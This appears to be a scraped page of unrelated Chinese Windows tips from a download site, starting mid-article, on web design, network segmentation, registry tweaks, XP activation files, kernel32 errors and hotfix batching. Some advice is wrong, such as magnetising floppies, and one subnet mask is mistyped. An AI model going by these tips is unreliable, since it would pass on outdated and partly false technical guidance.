对比来完成整个页面的配色方案。整个页面在视觉上应是一个整体，以达到和谐、悦目
的视觉效果。

五、设计的原则

设计是有原则的，无论使用何种手法对画面中的元素进行组合，都一定要遵循五个大的
原则：统一、连贯、分割、对比及和谐。
统一，是指设计作品的整体性，一致性。设计作品的整体效果是至关重要的，在设计中
切勿将各组成部分孤立分散，那样会使画面呈现出一种枝蔓纷杂的凌乱效果。
连贯，是指要注意页面的相互关系。设计中应利用各组成部分在内容上的内在联系和表
现形式上的相互呼应，并注意整个页面设计风格的一致性，实现视觉上和心理上的连贯
，使整个页面设计的各个部分极为融洽，犹如一气呵成。
分割，是指将页面分成若干小块，小块之间有视觉上的不同，这样可以使观者一目了
然。在信息量很多时为使观者能够看清楚，就要注意到将画面进行有效的分割。分割不
仅是表现形式的需要。换个角度来讲，分割也可以被视为对于页面内容的一种分类归
纳。
对比就是通过矛盾和冲突，使设计更加富有生气。对比手法很多，例如：多与少、曲与
直、强与弱、长与短、粗与细、疏与密、虚与实、主与次、黑与白、动与静、美与丑、
聚与散等等。在使用对比的时候应慎重，对比过强容易破坏美感，影响统一。
和谐是指整个页面符合美的法则，浑然一体。如果一件设计作品仅仅是色彩、形状、线
条等的随意混合，那么作品将不但没有“生命感”，而且也根本无法实现视觉设计的传
达功能。和谐不仅要看结构形式，而且要看作品所形成的视觉效果能否与人的视觉感受
形成一种沟通，产生心灵的共鸣。这是设计能否成功的关键。

六、网页的优化

在网页设计中，网页的优化是较为重要的一个环节。它的成功与否会影响页面的浏览速
度和页面的适应性，影响观者对网站的印象。
在资讯类网站中，文字是页面中最大的构成元素，因此字体的优化显得尤为重要。使用
css样式表指定文字的样式是必要的，通常我们将字体指定为宋体，大小指定为12px，
颜色要视背景色而定，原则上以能看清且与整个页面搭配和谐为准。在白色的背景上，
我们一般使用黑色，这样不易产生视觉疲劳，能保证浏览者较长时间地浏览网页。
图片是网页中的重要元素。图片的优化可以在保证浏览质量的前提下将其size降至最低
，这样可以成倍地提高网页的下载速度。利用Photoshop６或Fireworks４可以将图片切
成小块，分别进行优化。输出的格式可以为gif或jpeg，要视具体情况而定。一般我们
把有较为复杂颜色变化的小块优化为jpeg，而把那种只有单纯色块的卡通画式的小块优
化为gif，这是由这两种格式的特点决定的。
表格(table)是页面中的重要元素,是页面排版的主要手段。我们可以设定表格的宽度、
高度、边框、背景色、对齐方式等参数。很多时候，我们将表格的边框设为0，以此来
定位页面中的元素，或者籍此确定页面中各元素的相对位置。我们知道：浏览器在读取
网页html原代码时，是读完整个table才将它显示出来的。如果一个大表格中含有多个
子表格，必须等大表格读完，才能将子表格一起显示出来。我们在访问一些站点时，等
待多时无结果，按"停止"按钮却一下显示出页面就是这个原因。因此，我们在设计页面
表格的时候，应该尽量避免将所有元素嵌套在一个表格里，而且表格嵌套层次尽量要
少。在使用Dreamweaver制作网页时，会自动在每一个td内添加一个空字符“ ”。如果
单元格内没有填充其它元素，这个空字符会保留，在指定td的宽度或高度后，可以在源
代码内将其删去。
网页的适应性是很重要的，在不同的系统上，不同的分辨率下，不同的浏览器上，我们
将会看到不同的结果，因此设计时要统筹考虑。一般我们在800*600下制作网页，最佳
浏览效果也是在800*600分辨率下，在其它情况下只要保证基本一致，不出现较大问题
即可。
说了这么多，只是希望能对做“网页设计”的人有所帮助，希望他们在做网页的时候能
够从整体着眼，无愧于“设计”这两个字。顺便说一下，本文只代表本人个人观点，仅
供参考。

对于网页的框架与定位,这个是很难说得清楚的,这要看你在做网站时,对网站的
规划,并不能一并而论的,如果你没有这方面的经验,就多多在网上看看别人是如何设计
的吧,是非常的用的,可以把他们给抓下来,做个图库,方便自己设计

其实看看一些设计精良的网页，会对自己有很大的作用，
把别人的网页下载下来，再用相关的软件，进行分析，
可以学到许多的东西的，是一种快捷的学习方法，
但决不是COPY

我认为首要的是突出主题
一个好的网站(个人的只能算做网页)最首要的是突出你的主题,在别人搜索或访问时首
先就看有没有自己所需要的内容,要么就直奔主题.然后再在主题鲜明的基础上做好框架
设计.一个好的网站要做到层次分明,结构合理,让人一看就能明白你想要表达的中心思
想是什么,以及怎样才能以以最快的速度找到自己想要的内容.这两个主要问题解决后再
在一些细节上加以润色,就能制作出赏心悦目的网站.


如何实现网络分段

《一键清理系统垃圾》

如何实现网络分段

要实现网络分段，可以使用路由器、防火墙、带有虚拟局域网（VIAN）功能的三层交换机。如果没有这些设备该怎样实现网络分段呢？这里介绍三种在没有以上设备的情况下能够实现网络分段的经济、可靠的方法。

??随着校园网中计算机数量的迅速增长，计算机管理和计算机安全问题越来越突出。在网络使用初期，由于信息点少，我们只需设置成一个子网，不存在网络的分段问题，而随着用户的增加，就必须要采取措施来加强网络分段的管理。对网络进行分段管理，不仅便于网络维护，而且可以缩小冲突域的范围，隔离网段内部的广播风暴，使其不至影响其他网段中的用户，提高了网络的稳定性和实际可用带宽。

??多网卡主机软路由方式

??这是通过在Windows 2000 Server上安装多块网卡，利用Windows 2000 Server自带的路由器功能实现网络的分段管理。

??下面就以建立两个网段为例（多个网段的实现方法也一样），介绍一下实现方法。假设我们要建立两个网段：网段A的地址为192.168.1.0；网段B的地址为192.168.2.0。它们都是C类子网（IP地址前三段固定，最后一段为任意），子网掩码是255.255.255.0。现在通过安装在主机上的两块网卡将两个网段连接在一起。网络连接示意图如图1所示。

??一、主机设置

??以主机运行Windows 2000 Server为例，具体实现步骤如下。

??1． 安装、设置网卡

??安装好两块网卡，第一块网卡的IP地址设置为192.168.1.1；第二网卡的IP地址设置为192.168.2.1。子网掩码均设为255.255.255.0。

??2． 设置路由器

??（1）在“开始”菜单中依次选择“程序→管理工具→路由和远程访问”。

??（2）在弹出的“路由和远程访问”窗口左侧的“树”栏目中，右击“Server”项，在弹出的快捷菜单中选择“配置并启用路由和远程访问”项。

??（3）在弹出的“路由和远程访问服务器安装向导”中依次点击[下一步]按钮，当出现“公共设置”这一步时，你需要选择“网络路由器”一项，再单击[下一步]按钮。

??（4）在接下来的“路由的协议”中，你应该确定在“协议”列表框中有“TCP/IP”一项，若有此协议，可点击“是，所有可用的协议都在列表上”，然后点击[下一步]按钮继续。

??（5）接下来系统会提示：“您想通过请求拨号来访问远程网络吗？”，点选“否”，然后点击[下一步]按钮，路由器的配置工作就完成了。

??二、客户机设置

??如果想要实现192.168.1.0和192.168.2.0两个IP地址段的计算机之间的互访，在安装并设置好IP路由后，还必须对客户机做相应的设置。对于192.168.1.0IP地址段中的计算机，需将其默认网关设置为192.168.1.1；而对于192.168.2.0IP地址段中的计算机，则需将其默认网关设置为192.168.2.1。网络内的计算机都分别设置默认网关后，即可实现不同网段计算机之间的互访。

??三、注意事项

??1. TCP/IP、IPX/SPX协议支持路由功能，而NetBEUI协议不支持路由功能。

??2. Windows 2000 Server 能支持4块网卡之间的路由连接。

基于第二层交换的多网卡路由方式

??实现这种路由方式的前提是每一网段有一台主机需装两块网卡（这种方式适合于学校各机房之间分段），主机运行操作系统可以是Windows 98或Windows 2000，下面还是以建立两个网段为例，网段地址与上例同。网络连接示意图如图2所示。

?一、网段A主机设置

??安装好两块网卡，第一块网卡的IP地址设置为192.168.1.1，不设置网关；第二网卡的IP地址设置为192.168.2.254，网关设置为192.168.1.10。子网掩码均设为“255.255.255.0”。

??二、网段B主机设置

??安装好两块网卡，第一块网卡的IP地址设置为192.168.2.1，不设置网关；第二网卡的IP地址设置为192.168.1.10，网关设置为192.168.2.254。子网掩码均设为“255.255.255.0”。

??三、客户机的设置

??与上例的客户机的设置相同。

??四、说明

??用双网卡方式实现网络分段，实现的方式比较多，用户可以根据自己的情况加以选择。这种方式最大的优点是简单、实用、成本低，但在网络规模稍大时，这种方式就不易于管理了，而且会出现网络阻塞现象。

??IP转发方式

??用第一种方式实现网络互连，必须在每两个网段之间使用一台主机（两块网卡）才能将两个不同的网段进行连接。如果网络规模稍大、网段多，这种方式使网络维护和管理变得比较复杂，因此我们可以设一台主机做IP转发器，一个网段上的计算机要想访问另外网段上的计算机，通过该主机进行IP转发。

??IP转发是指某一网络接口接收的IP包转发至另一个网络接口的过程。这意味着执行IP转发的主机既非数据来源，也非接收方。这种主机本质上是与两个或更多的网络连接。该主机接收来自某一网络的IP包，分析IP包，以决定使用路由机制向哪个网络转发IP包，然后使用其他网络接口把IP包发送至目的地。下面以具体的实例来讲述如何实现IP转发。

一、网络结构及配置方法

??为了方便起见，这里设计了一个简单的网络模型（如图3所示）。假设网络分三个网段（202.100.204.152，子网掩码为为255.255.255.248，为服务器区子网；192.168.2.0为教师子网；192.168.3.0为学生机房子网）。另外，内网接通了DDN专线，路由器对内的以太口地址为202.100.204.158，IP转发主机的IP地址为192.168.2.254。教师子网和学生机房子网的计算机能够访问服务器区子网上的内部服务器，还能直接访问Internet。

??二、Windows 2000 Server主机和客户机的设置

??1. 给主机绑定三个IP地址，使主机能够访问上述三个网段。首先给主机的网络适配器设置IP为202.100.204.153，子网掩码为225.225.225.248，然后给它绑定两个虚拟IP，分别是192.168.2.1和192.168.3.1。完成这步操作后，三个子网上的计算机都能访问该主机，但子网间还不能进行IP通讯。

??2. 启动主机路由转发服务，在Windows 2000中启动Routing and Remote Access服务。

??3. 设置好主机路由后，还必须对客户机做相应的设置。对于192.168.2.0地址段中的计算机，需将其默认网关设置为192.168.2.1；而对于192.168.3.0地址段中的计算机，则需将其默认网关设置为192.168.3.1。网络内的计算机都分别设置默认网关后，即可实现不同网段计算机之间的互访。

??4. 如果教师子网和学生子网上的计算机需要访问Internet，还需给主机配置一个默认网关，使其指向路由器对内的以太口地址202.100.204.158。

??三、说明

??虽然使用IP转发方式可以很方便地实现网络之间的通讯，但它不能有效地防止网络风暴，同时主机也可能成为通讯瓶颈。


如何使IE不再发送错误报告

《一键清理系统垃圾》

如何使IE不再发送错误报告

问题描述 ：
    在使用IE浏览网页的过程中，出现“Microsoft Internet Explorer遇到问题需要关闭……”的信息提示。此时，如果单击“发送错误报告”按钮，则会创建错误报告，单击“关闭”按钮之后会引起当前IE窗口关闭；如果单击“不发送”按钮，则会关闭所有IE窗口。

故障原因及解决方案 ：
    这是IE为了解用户在使用中的错误而设计的一个小程序。
    针对不同情况，可分别用以下方法关闭IE发送错误报告功能:

1.对IE5.x用户，执行“控制面板→添加或删除程序”，在列表中选择“Internet Explorer error reporting”选项，然后单击“更改/删除”按钮，将其从系统中删除。
2. 对windows 9x/me/nt/2000下的IE 6.0用户，则可打开“注册表编辑器”，找到[hkey_local_machine＼software ＼microsoft＼internet explorer＼main]，在右侧窗格创建名为iewatsonenabled的dword双字节值，并将其赋值为0。
3.对windows XP的IE 6.0用户，执行“控制面板→系统”，切换到“高级”选项卡，单击“错误报告”按钮，选中“禁用错误报告”选项，并选中“但在发生严重错误时通知我”，最后单击“确定”按钮。


重新安装IE浏览器

《一键清理系统垃圾》

重新安装IE浏览器

    问：我使用的是Windows XP系统，系统自带的IE浏览器可能出现问题，现在我想重新安装IE，请问如何实现？

    答：打开注册表编辑器，找到HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11cf-8B85-00AA005B4383}，把右边的DWOD值IsInstalled从1改成0即可。如果需要重新安装OE，修改HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{44BBA840-CC51-11CF-AAFA-00AA00B6015C}中的上述同样内容就可以了。然后运行IE的安装程序，就可以重新安装了。


软盘起死回生小技巧

《一键清理系统垃圾》

软盘起死回生小技巧

适用范围：长时间不用的、不能格式化或格式化后坏道太多的磁盘，但应是非物理性损坏的磁盘。

工具：FORMAT.EXE、HD.EXE、一块磁铁。

操作方法：

1.用磁铁放在软盘的读写窗口上，旋转盘片，目的是用磁铁的磁性均匀地将整个盘片磁化一遍，为磁盘上的磁介质补充磁性。

2.首先，用HD.EXE工具格式化补充磁性后的磁盘，此时，有的磁盘已能使用。

3.若不能使用，再用FORMAT.EXE格式化磁盘(此项为可选项，因有时，用HD格式化完的磁盘还不能使用)。

注意：必须先用HD.EXE格式化，再用FORMAT.EXE来格式化。


Windows XP下扫描仪的安装和使用

《一键清理系统垃圾》

Windows XP下扫描仪的安装和使用

2002-01-17　　　　　　 作者:

    听说过Windows XP吗，你肯定听说了。Windows XP是微软公司2001年最新发布的操作系统软件，它内建了标准的静态图像获取程序，也就是说，只要正确安装了扫描仪的驱动程序，就可以直接使用Win XP自带的软件来扫描了。下面，一起来开始我们的“XP扫描仪之旅”，无限风光就在眼前。

    Win XP下扫描仪的安装

    第一站，当然是安装扫描仪了。Windows XP下的安装过程和通常在Win 98, Win 2000下的安装过程相似。安装成功后，在“控制面板*打印机和其它设备*扫描仪和数码相机”项目下会出现扫描仪的图标(如下图1)

图1

    Win XP下启动扫描仪的方式

    第二步：启动扫描仪：由于Windows XP自带了扫描程序，所以扫描仪的启动方式最多可以有三种：Win XP自带，驱动程序独立运行和其它应用程序调用三种方式，都可以启动一台扫描仪。

    驱动程序独立运行：指驱动程序在安装的时候，同时安装了一个可以调用扫描仪的程序，这种方式一般都会在桌面和开始菜单中建立快捷方式(如下图2示)，直接双击运行即可。

图2

    提示：并不是所有的扫描仪都厂家都提供这样启动扫描仪的方式！

    (双击桌面的图标或使用开始菜单项启动明基Mirascan4.0后的画面如下图3)

图3

    其它程序调用：指需要从其它运行中的程序来启动扫描仪，例如在Microsoft Word中，如果要从扫描仪扫描一张图片并插入到文档中，则在菜单项“插入*图片*从扫描仪和数码相机”可以直接启动扫描仪；在Photoshop中则是用主菜单“文件*获取”来调动扫描仪扫描仪图片，都是使用这种方式。

    最后是Win XP自带方式：指直接使用操作系统自带的标准程序来启动扫描仪。


删除右键菜单的内容

《一键清理系统垃圾》

删除右键菜单的内容

首先单击“开始”菜单中的“运行”命令，打开“运行”对话框，在“打开”栏里输入“regedit”，然后按“确定”。然后在打开的“注册表编辑器”窗口中，打开 HKEY_CURRENT_USER\Software\ Microsoft\Internet Explorer\MenuExt主键，在该主键下会有许多的子主键，这些子主键的名称就是显示在右键菜单中的命令，只需找到显示命令的那条主键条目，单击鼠标右键，在弹出的快捷菜单中选择“删除”即可。


闪盘不可以随便拔吗

《一键清理系统垃圾》

闪盘不可以随便拔吗

    众所周知，当我们正在使用闪盘时，如果随便拔出，则有可能导致闪盘数据的丢失，因此，要拔下闪盘的时候，需遵循如下的操作：鼠标左键单击系统托盘的闪盘图标→“安全删除USB Mass Storage Device-驱动器”，这时就可以安全地把闪盘从系统上拔下来。但是，在使用时，许多人都会忘记这样来操作。闪盘真的不可以随便拔吗？事实并非绝对。在Windows XP中，鼠标右键单击桌面的“我的电脑→属性→硬件→设备管理器”，进入设备管理器窗口，双击“磁盘驱动器”，再双击在展开的“USByte USByte disk USB Devic（闪盘设备名称）”，进入“USByte USByte disk USB Devic属性”窗口，单击窗口的“策略”项，点选“为快速删除而优化”项。这样，通过停用磁盘和Windows的写入缓存，你就不用再进行上述操作，直接拔除闪盘就可以了。


慎用还原Wpa.dbl文件

《一键清理系统垃圾》

慎用还原Wpa.dbl文件

慎用还原Wpa.dbl文件来达到使WindowsXP永远激活的目的

WinXP新增的激活功能很是讨厌。我想没有人会反对这个观点的。于是就有人提出备份WindowsXP的激活文件来达到永远激活WinXP的目的而不需要重新上网/打电话激活了。接着就有人说明了这个文件就是Wpa.dbl,没错，WindowsXP就是这个验证这个文件来确定你的WindowsXP是否需要激活/重新激活。但是经过我的一番实践，发现这个方法有欠妥之处。
前几日，我的WindowsXP发生问题，导致系统误认为我的硬件系统发生变化，导致我的WindowsXP需要重新激活，并且锁定了我的正常登陆模式，并且提示你的WindowsXP需要重新激活，可事实上我的硬件系统没有发生任何变化，并没有添加/删除任何硬件设备，也没有更新BIOS/固件，可是WindowsXP还是认为我的WindowsXP需要重新激活，没有办法，我找上面提到的方法在win98下（我的机子装有3个系统，分别是Win98/2000/XP）把WPA.DBL文件还原到原位置并且覆盖了源文件，重新启动到WindowsXP以后发现系统果然已经激活了，一阵喜悦之情马上溢于言表。但是当我想看看系统属性的时候，发现提示有一个用于提供系统属性信息的服务没有启动，我马上到控制面板/管理工具/服务里面察看是否没有启动，经过检查，发行服务并非系统提示中说的那样没有启动，而是正在正常的运行。随后我在命令窗口模式中输入systeminfo，结果遭到拒绝。我感到很奇怪，于是到系统日志中察看，最终发现硬件数据库被毁坏了。结果导致不能使用系统信息工具。而且那个硬件设备数据库我没有备份，我想这可遭了。虽然系统基本上没有问题，但是不知道系统的稳定性如何，因为硬件数据库的被破坏的后果最终会导致系统不认识我的硬件设备/错误的认识。还好我前一天在系统完全正常的情况下（也无需激活）使用了系统还原工具做了一个备份，于是我启动系统还原工具，结果发现我的系统还原备份点全部被删除了！后果当然是不能使用系统还原功能。

这么办？重新安装？不！我想到了还有之后一招：是用修复WindowsXP的功能。说起这个修复WindwsXP，这可是一个很好用的方法：修复就相当于Windows98的覆盖安装一样，不但可以保留所有软件，而且还可以保留所有的设置，是一个修复系统的很好的方法。

因为使用上比较复杂，所以我画了使用流程图如下：

使用WindowsXP启动以后
----------------------
|
|
F6-->安装额外的SCSI/RAID驱动
|
|
F2-->使用Windows Automated System Recovery Disk(ASR)修复系统（最佳选择，不过事先要制作ASR软盘）
|
|
安装WindowsXP 按ENTER键
故障控制台修复WindowsXP 按R键-------〉会启动故障控制台（适用于高级用户）
放弃安装 按F3
|
|
<按ENTER键>
|
|
同意安装协议
|
|
自动搜索老版本的Windows(不能搜索NTFS文件系统)
|
|
搜索完成以后会提示搜索到的Windows，不会有Win98，移动光标到要修复的Windows操作系统上
|
|
修复安装WindowsXP 按R键--------〉会自动启动安装界面并且开始安装，耗时和全新安装差不多，安装结束前会要求填入CD-KEY，全部结束以后就可以启动到WindowsXP下了，并且已经安装的软件和个人信息不会丢失，但是还是有些问题（见后面）
全新安装 按F8键-------〉会按照全新安装模式安装系统。

我选择了修复安装WindowsXP以后，系统开始安装了，经过漫长的45钟以后，安装结束，登录进WindowsXP以后，发现果然可以使用系统信息了，而且硬件设备数据库也修复了，系统仍然处于无需激活状态，但是接着发现好像还是有些问题没有解决：
1.以前安装的所有补丁全部丢失，需要重新安装。
2.显卡驱动程序被更换成WindowsXP自带的，想必是我的显卡驱动没有数字签名。
3.Intel应用程序加速器软件丢失，需要重新安装。
4.systeminfo不能够全部反映出整个系统的信息。以前能够显示的启动了多少时间的，修复后不能够显示，以前能够显示的已经安装了多少个补丁修复以后只能够显示几个（即使全部补丁安装完毕也是这样）。

虽然我的系统已经修复，但是没解决的问题仍然存在，如果大家知道解决方法（就是问题4的解决方法），请来信告知。

修复注意事项：
1.必须使用上次安装的CD，不然即使修复成功也不能够登录。
2.要求立即激活的系统修复以后仍然要求立即激活。
3.关于锁定：这里有些误解会认为磁盘被锁定了，数据会丢失了，这些全是谎话，真实的情况是不能够登录到正常模式下，但是安全模式下仍然可以使用，而且磁盘也没有问题。也可以使用DOS操作或故障控制台的操作，如果安装有其他的操作系统，也可以操作。
4.关于被锁定以后硬盘损坏：这个完全是有人恶意造谣的问题。
5.关于逻辑炸弹：所谓的逻辑炸弹就是在一定条件下发生作用的一个程序，比如KV的江民炸弹。但是请大家注意：在一定条件下发生作用的程序不一定是逻辑炸弹，比如共享软件的试用期和WindowsXP的试用期等等。这些程序在没有注册/激活的情况下都有一定的条件限制，但是一旦经过注册/激活以后，这个条件限制就自动解除了。并不存在WindowsXP超过使用期限没有激活就会导致硬盘损坏的谣言。
6.关于激活：没有激活前可以使用30天，如果已经激活，但是硬件改变量超过5件，仍然需要重新激活（硬件改变量指有改变的硬件设备。注意有的硬件改变以后，其改变量会被认作是2或更高，如网络设备）。安装虚拟光驱软件也会被认作是硬件发生改变，升级BIOS/固件，修改IDE设备的主从关系也会被认作系统硬件发生改变，这里需要大家格外注意。
7.正版用户的激活限制：一般来说是5次，但是只要你超过5次以后打免费电话到微软（中国）激活中心说明情况以后，他们会把数据库的记录清零，也就是说没有激活次数的限制。

OK!如果大家还有什么疑问可以来信和我谈论。本文到此结束。


www.163164.com 什么是kernel32内核文件 QQ 3149886

双击滚屏 单击停止

什么是kernel32内核文件

kernel32.dll是Windows 9x/Me中非常重要的32位动态链接库文件，属于内核级文件。它控制着系统的内存管理、数据的输入输出操作和中断处理，当Windows启动时，kernel32.dll就驻留在内存中特定的写保护区域，使别的程序无法占用这个内存区域。

有时，Windows会弹出“非法页错误”的消息框，简单地说，这是因为某个或多个程序试图访问kernel32.dll所占用的内存保护区域，从而产生冲突而造成的。该错误一般由某个特定的程序引起，也可能是多个文件或程序。如果是由某个程序引起，那么可以尝试重新安装或升级该程序来解决问题，而如果由多个文件和程序引起，那就极有可能是因损坏的硬件设备驱动而引起的。

引起kernel32出错的主要元凶

1.Windows自身的临时交换文件被破坏；

2.文件分配表（FAT）出现错误；

3.用户名和密码列表错误；

4.装载了已经被破坏的或者是不正确版本的ker -nel32.dll文件；

5.注册表文件被损坏；

6.计算机硬件有问题，如CPU过热、超频使用、损坏的电源、地线波动、射频噪音、损坏的磁盘控制器；

7.BIOS中等待状态设置出现问题，或者RAM时钟有错误；

8.已经损坏或者没有正确、完整地安装软件；

9.临时文件夹不存在或者已经损坏；

10.损坏的控制面板文件(扩展名为cpl)；

11.不正确或者已经损坏的硬件驱动程序；

12.没有正确安装打印机驱动程序；

13.Java设备错误；

14.已经被破坏的.LOG日志文件；

15.访问历史文件夹错误；

16.不合适的或损坏的动态链接库文件；

17.机器感染了病毒；

18.损坏的或者不正确版本的msinfo32.exe文件；

19.磁盘空间不足。

行之有效的解决方案

知道了哪些情况可能引起kernel32.dll文件出问题，那么就可以采取排除法一一解决。不过，在大多数情况下，我们建议你优先实施以下解决方案：

1.错误的内存模块：用“记事本”打开根目录下的config.sys，并在其中插入命令行：DEVICE=C:\WINDOWS\HIMEM.SYS /TESTMON，然后在电脑重启时观察屏幕所显示的HIMEM has detected unreliable memory at address xxxxxxxxx，这样就可以基本确定内存出了问题。不过，这可能需要重启几次来逐一发现。当然也可以下载、运行相应的系统诊断软件，特别是内存检测软件；

2.错误的显卡驱动程序：最新版本的显卡驱动程序可以保证显卡更加稳定、高效地运行，因此你要确保显卡驱动程序是最新版本；

3.超频CPU、总线速度：如果想要你的电脑运行得更加稳定、持久，建议不要将CPU和总线超频使用，恢复到默认值；

4.CPU或者电源风扇转速不正常或落满灰尘：风扇的不稳定可能导致CPU或电源温度过高，从而引起系统不稳定。CPU风扇可以用小刷子和吹风机处理，电源风扇则需要由专业人员清扫；

5.图形加速设置过高：右击“我的电脑”，选择“属性”命令，在“性能”选项卡中选择“图形”按钮，将硬件加速调低一个刻度，然后确定后重启，如果还有问题，再重复以上步骤继续往下调低一个刻度，直到正常为止；

6.动画光标、鼠标轨迹和活动桌面：这些花哨的设置都有可能引起kernel32.dll错误，尝试禁用这些功能，然后再一个一个激活这些功能，直到发现错误为止；

7.相当有效的解决方案：实践证明这个方法解决过许多ker- nel32.dll崩溃的问题。在C盘根目录下，用“记事本”创建或者直接修改系统配置文件config.sys，在其中加入如下3行语句：

FILES=65

BUFFERS=40

STACKS=64,512

如果错误仍然存在，可使用“记事本”打开系统文件夹下（如〈C:\Windows\〉）的system.ini文件，然后在[386Enh]节上加入如下两行语句：

; Increases default stack pages from 2 to 6

MinSPs=6

（MinSPs默认值是2，如需要，每次增加2直到解决问题为止，而第一句前面的“;”主要起注释作用。）

修改好后保存退出，重启使之生效。

8.删除临时交换文件：如果错误仍然存在，可以尝试删除 Windows的临时交换文件Win386.swp来解决问题，不过该文件无法在Windows下删除，你需要退到DOS实模式下进行，进入系统目录（如C盘〈Windows〉目录）删除Win386.swp，当系统重启后Windows会重新生成该文件。

9.密码列表损坏：如果系统密码列表文件被损坏也会引起错误，这时需要重建该文件，在“资源管理器”中选择〈Windows〉文件夹，然后按下F3调出查找对话框，在文件名中键入：*.pwl，然后进行查找，当符合条件的文件列出来后，将它们全部删除掉，接着重启，让系统重建密码列表文件。

10.病毒：如果系统显示的是MSIMN错误导致kernel32.dll产生无效页面错误，那么你的电脑很有可能被Happy 99蠕虫病毒所侵害，你需要使用杀毒软件对你的系统进行一下清除。

关于svchost.exe

概要
本文描述 Svchost.exe 及其功能。Svchost.exe 是从动态链接库 (DLL) 中运行的服务的通用主机进程名称。
更多信息
Svchost.exe 文件位于 %SystemRoot%\System32 文件夹中。启动时，Svchost.exe 将检查注册表的服务部分，以构建需要加载的服务的列表。Svchost.exe 的多个实例可同时运行。每个 Svchost.exe 会话可以包含一组服务，以便可以根据 Svchost.exe 的启动方式和位置的不同运行不同的服务。这样可以更好地进行控制，且更加便于调试。

Svchost.exe 组由以下注册表项标识： HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsNT\CurrentVersion\Svchost

此注册表项下的每个值都代表单独的 Svchost 组，并在您查看活动进程时作为单独的实例显示。每个值均为 REG_MULTI_SZ 值，并且包含在该 Svchost 组下面运行的服务。每个 Svchost 组都可以包含一个或多个从以下注册表项提取的服务名称，该注册表项的参数项包含一个 ServiceDLL 值： HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\服务

要查看在 Svchost 中运行的服务的列表，请执行以下操作：
单击 Windows 任务栏上的开始，然后单击运行。
在打开框中，键入 CMD，然后按 ENTER 键。
键入 Tasklist /SVC，然后按 ENTER 键。
Tasklist 命令显示活动进程的列表。/SVC 命令开关显示每个进程中活动服务的列表。有关进程的详细信息，请键入以下命令，然后按 ENTER 键： Tasklist /FI "PID eq 进程 ID"（带引号）

以下的 Tasklist 命令输出示例显示正在运行的 Svchost.exe 的两个实例。 Image Name PID　Services
   ========================================================================
System Process　　　　0　　 N/A
System　　　　　　　　8　　 N/A
Smss.exe　　　　　　132　　 N/A
Csrss.exe　　　　　 160　　 N/A
Winlogon.exe　　　　180　　 N/A
Services.exe　　　　208　　 AppMgmt,Browser,Dhcp,Dmserver,Dnscache,
Eventlog,LanmanServer,LanmanWorkstation,
LmHosts,Messenger,PlugPlay,ProtectedStorage,
Seclogon,TrkWks,W32Time,Wmi
Lsass.exe　　　　　　220　　Netlogon,PolicyAgent,SamSs
Svchost.exe　　　　　404　　RpcSs
Spoolsv.exe　　　　　452　　Spooler
Cisvc.exe　　　　　　544　　Cisvc
Svchost.exe　　　　　556　　EventSystem,Netman,NtmsSvc,RasMan,
SENS,TapiSrv
Regsvc.exe　　　　　 580　　RemoteRegistry
Mstask.exe　　　　　 596　　Schedule
Snmp.exe　　　　　　 660　　SNMP
Winmgmt.exe　　　　　728　　WinMgmt
Explorer.exe　　　　 812　　N/A
Cmd.exe　　　　　　 1300　　N/A
Tasklist.exe　　　　1144　　N/A

此示例的两种组合的注册表设置如下所示：
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Svchost:
Netsvcs:Reg_Multi_SZ:EventSystem Ias Iprip Irmon Netman Nwsapagent Rasauto Rasman Remoteaccess SENS Sharedaccess Tapisrv Ntmssvc
RApcss :Reg_Multi_SZ:RpcSs

这篇文章中的信息适用于:
Microsoft Windows XP Professional
最近更新: 2003-7-23 (1.0)
关键字 kbinfo KB314056

Microsoft和/或其各供应商对于为任何目的而在本服务器上发布的文件及有关图形所含信息的适用性，不作任何声明。 所有该等文件及有关图形均"依样"提供，而不带任何性质的保证。Microsoft和/或其各供应商特此声明，对所有与该等信息有关的保证和条件不负任何责任，该等保证和条件包括关于适销性、符合特定用途、所有权和非侵权的所有默示保证和条件。在任何情况下，在由于使用或运行本服务器上的信息所引起的或与该等使用或运行有关的诉讼中，Microsoft和/或其各供应商就因丧失使用、数据或利润所导致的任何特别的、间接的或衍生性的损失或任何种类的损失，均不负任何责任，无论该等诉讼是合同之诉、疏忽或其它侵权行为之诉。

当前版本：2006-11-28 www.163164.com 下载:《一键清理系统垃圾》程序，保持系统的“苗条”身材与运行速度！ 收藏本站


使用QChain在Windows中安装多个修补程序

《一键清理系统垃圾》

使用QChain在Windows中安装多个修补程序

这篇文章中的信息适用于:
Microsoft Windows 2000 Advanced Server
Microsoft Windows 2000 Professional
Microsoft Windows 2000 Server
Microsoft Windows 2000 Datacenter Server

概要：
系统管理员可使用 QChain.exe 工具对多个修补程序进行链式安装，而无需在安装每一修补程序之后重启计算机。通常，安装每一修补程序之后，均需重启计算机。QChain.exe 加快了多个修补程序的安装过程，因为不必在安装每一修补程序之后重启计算机。必须安装的修补程序越多，就越省时间。使用 QChain.exe 的另一好处是延长了服务器的正常运行时间，因为只需重启一次服务器。QChain.exe 还避免了在不重启计算机的情况下安装多个修补程序可能出现的问题。如果在安装多个修补程序时不重启计算机（不使用 QChain.exe），则可能由于修补程序的安装顺序而导致更新错误的文件版本。

如何在仅重启一次的情况下安装多个修补程序
若要安装多个修补程序而只重启一次计算机，请执行下列步骤：

从 Microsoft 网站获得相应的修补程序。将每个修补程序放在本地硬盘上各自的文件夹下。 （取得的方法：可以从Windowsupdate的更新目录里面下载，也可以从微软Support或MSDN处得到）
安装修补程序。但是，不要双击修补程序文件来运行其安装例程，而应在命令提示符下使用 -z 开关来运行其安装程序。-z 开关阻止修补程序的安装程序自动重启计算机。还可以使用 -m 开关在安静模式下运行修补程序。修补程序的安装程序文件可能为两个名称之一：Q nnnnnn _w2k_spx_en.exe 或 Hotfix.exe。如果文件已解压缩，则使用 Hotfix.exe 安装程序。
安装完所有修补程序后，在命令提示符下运行 QChain.exe 程序。
运行 QChain.exe 之后，重启计算机。
如何通过一个简单的批处理文件安装多个修补程序
您可以通过一个简单的批处理文件来安装多个修补程序并运行 QChain.exe。如果要使用这一方法，应确保所有修补程序及 QChain.exe 工具位于本地硬盘的同一文件夹下。创建包含下列各行的批处理文件：
@echo off
setlocal
set PATHTOFIXES= some_path

%PATHTOFIXES%\Q123456_w2k_sp2_x86.exe -z -m
